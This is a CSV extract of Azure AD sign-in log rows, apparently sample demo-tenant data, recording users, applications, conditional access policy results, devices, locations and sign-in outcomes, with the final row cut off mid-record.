+657,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:45.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f7fa5667-f44a-4a74-95af-eb8e3d04d7fc,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",973ebc26-a5be-4a53-afb2-eb08f0cd1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,973ebc26-a5be-4a53-afb2-eb08f0cd1300,SigninLogs,Sucess,33.7984581,-84.38828278
+658,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:34.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,660c5cdf-3fcd-4acd-8c84-eacd84de63a2,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",ace1d4a5-fd0b-463d-bfa6-011c541e1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ace1d4a5-fd0b-463d-bfa6-011c541e1600,SigninLogs,Sucess,41.90428925,-85.99833679
+659,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:34.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cf11ce66-667b-4399-88d8-278415af06fd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c28d974f-07cf-4d4e-a7f6-a6e8050c1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c28d974f-07cf-4d4e-a7f6-a6e8050c1300,SigninLogs,Sucess,33.7984581,-84.38828278
+660,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:11.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:57,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",4f81df68-d275-4b53-b73e-e16a47f85300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4f81df68-d275-4b53-b73e-e16a47f85300,SigninLogs,Sucess,32.32146072,34.85319901
+661,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:47.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0fc6979c-8ba8-485f-926e-5902dd8af924,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5fa972fe-7fa8-4b4b-bbdd-e6021f821400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5fa972fe-7fa8-4b4b-bbdd-e6021f821400,SigninLogs,Sucess,33.7984581,-84.38828278
+662,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:48.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,03369eb3-ca78-4555-a449-fd2916bbea89,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",aa57d52a-288e-488c-a4a9-011b65dd1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,aa57d52a-288e-488c-a4a9-011b65dd1200,SigninLogs,Sucess,33.7984581,-84.38828278
+663,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:43.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,bd16479f-8045-0000-5683-424995b0e98c,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",2b6dd05c-6ab3-47f4-b023-40d0a9631300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,2b6dd05c-6ab3-47f4-b023-40d0a9631300,SigninLogs,Failed,33.7984581,-84.38828278
+664,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:24.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0d8924b1-eb67-4037-99b8-1f3d4e6c2724,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",99101c3d-fa2a-42b6-a9d2-fbb9d1af1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,99101c3d-fa2a-42b6-a9d2-fbb9d1af1400,SigninLogs,Sucess,36.6404686,-78.26995087
+665,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:17.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 